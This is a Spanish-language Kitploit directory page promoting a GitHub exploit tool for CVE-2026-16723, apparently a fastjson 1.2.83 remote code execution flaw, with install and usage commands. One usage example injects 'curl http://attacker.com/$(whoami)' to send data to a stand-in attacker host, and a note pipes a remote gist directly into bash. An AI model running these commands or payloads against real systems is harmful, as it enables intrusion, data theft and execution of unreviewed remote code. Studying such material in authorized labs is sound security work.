Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/horkimhab/cve-2026-16723
Aprendizaje y Educación
GitHubhorkimhab/cve-2026-16723

CVE-2026-16723

CVE-2026-16723

Ver RepositorioSitio web
11hace 25 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-16723

Donar

Apoya el mantenimiento de este proyecto con PayPal o escaneando el código QR a continuación.

paypal

Código QR para donación

⚡ Uso Sencillo

Usa este proyecto solo en entornos seguros y autorizados, como:

  • Máquinas virtuales locales
  • Contenedores Docker
  • Entornos de laboratorio aislados
  • Entornos de pruebas de penetración autorizados

Ejemplo de configuración:

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2026-16723
cd CVE-2026-16723

# Download fastjson JAR (optional - script will auto-download)
wget https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.83/fastjson-1.2.83.jar

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

Ejemplo de uso:

root@kitploit:~
# Basic exploit
python CVE-2026-16723.py -t http://localhost:8080/parse

# Custom command
python CVE-2026-16723.py -t http://localhost:8080/parse -c "id > /tmp/result"

# With custom IP and port
python CVE-2026-16723.py -t http://localhost:8080/parse -c "whoami" --remote-ip 192.168.1.100 --port 9000

# HTTPS target
python CVE-2026-16723.py -t https://target.com/api/parse -c "curl http://attacker.com/$(whoami)" --insecure

# Using proxy
python CVE-2026-16723.py -t http://localhost:8080/parse --proxy http://127.0.0.1:8080

# Custom FD range
python CVE-2026-16723.py -t http://localhost:8080/parse --fd-range 10-50

# Quiet mode
python CVE-2026-16723.py -t http://localhost:8080/parse --quiet

Nota:

  • si clonas desde otro proyecto, debes ejecutar curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y para limpiar el directorio .git anidado
  • p. ej.: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Créditos o Referencias

  • https://fearsoff.org/research/fastjson-1-2-83-rce
  • https://thehackernews.com/2026/07/fastjson-1x-rce-vulnerability-targeted.html
  • https://aiweekly.co/alerts/alibabas-fastjson-1x-hit-by-active-rce-exploits-no-patch

📚 Repositorio Educativo de Investigación en Seguridad

Un repositorio para aprender, probar e investigar conceptos de ciberseguridad en entornos controlados.


⚠️ Descargo de Responsabilidad Legal y de Seguridad

Propósito

Este repositorio es solo para investigación de seguridad educativa y autorizada.

Está diseñado para ayudar a los usuarios a aprender sobre:

  • Vulnerabilidades de seguridad
  • Conceptos de sandbox y aislamiento
  • Prácticas de codificación segura y defensivas

Solo Uso Autorizado

Usa este repositorio solo en entornos donde tengas permiso, como:

  • Laboratorios personales o máquinas virtuales
  • Entornos Docker o aislados
  • Pruebas de penetración autorizadas
  • Formación en ciberseguridad o investigación académica

El uso no autorizado o ilegal está estrictamente prohibido.


Sin Responsabilidad

El autor y los colaboradores no son responsables de ningún daño, mal uso, problema legal o pérdida causados por este proyecto.

Al usar este repositorio, aceptas que:

  • Eres responsable de tus propias acciones
  • Lo usarás de forma legal y ética
  • El proyecto se proporciona sin garantía

Uso Ético

Este proyecto está destinado a:

  • Investigación de seguridad defensiva
  • Educación en ciberseguridad
  • Concienciación sobre vulnerabilidades
  • Investigación de sistemas y software seguros

Sigue prácticas de divulgación responsable y cumple con todas las leyes aplicables.


Contacto

Para divulgación responsable o colaboración, contacta con el mantenedor del repositorio a través de GitHub.

Descargar herramienta